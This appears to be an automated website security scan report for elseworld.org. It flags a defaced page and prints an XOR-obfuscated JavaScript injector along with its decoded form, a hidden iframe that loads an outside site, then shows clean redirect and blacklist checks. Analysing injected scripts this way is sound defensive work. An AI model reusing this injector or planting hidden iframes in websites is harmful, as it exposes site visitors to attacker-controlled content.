Scanned pages/files
Request | Server response | Status |
http://elseworld.org/ | 200 OK Content-Length: 11983 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var enkripsi="'02'02'02'02'1Akdpcog'02qpa'1F'00jvvr'1C--`cn{cl,kp-fgom-pf,jvon'00'02qapmnnkle'1F'00lm'00'02jgkejv'1F'00332'07'00'02ukfvj'1F'00322'07'00'02kf'1F'00dpo'00'1G'1A-kdpcog'1G"; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i<panjang;i++){ teks+=String.fromCharCode(enkripsi.charCodeAt(i)^2) }teksasli=unescape(teks);document.write(teksasli); Decoded script: <iframe src="http://balyan.ir/demo/rd.html" scrolling="no" height="110%" width="100%" id="frm"></iframe> Deface/Content modification. The following signature was found: Hacked By Dr4GOn <!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8" /> <title>Hacked By Dr4GOn</title> <style> #frm{ border:none; overflow:no-content; position:absolute; top:0; left:0; z-index:-100; } .wrapper{ width:100%; height:100%; background:transparent; position:absolute; z-index:-99; top:0; ...[13399 bytes skipped]... | ||
http://elseworld.org/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: elseworld.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 15 Dec 2015 16:16:31 GMT
Accept-Ranges: bytes
ETag: "2ecf-45d7685d9a500"
Server: Apache
Vary: Accept-Encoding
Content-Length: 11983
Content-Type: text/html
Last-Modified: Sun, 07 Dec 2008 15:25:40 GMT
X-Pad: avoid browser bug
...11983 bytes of data.
GET / HTTP/1.1
Host: elseworld.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 15 Dec 2015 16:16:31 GMT
Accept-Ranges: bytes
ETag: "2ecf-45d7685d9a500"
Server: Apache
Vary: Accept-Encoding
Content-Length: 11983
Content-Type: text/html
Last-Modified: Sun, 07 Dec 2008 15:25:40 GMT
X-Pad: avoid browser bug
...11983 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: elseworld.org
Referer: http://www.google.com/search?q=elseworld.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: elseworld.org
Referer: http://www.google.com/search?q=elseworld.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=elseworld.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://elseworld.org/
Result: elseworld.org is not infected or malware details are not published yet.
Result: elseworld.org is not infected or malware details are not published yet.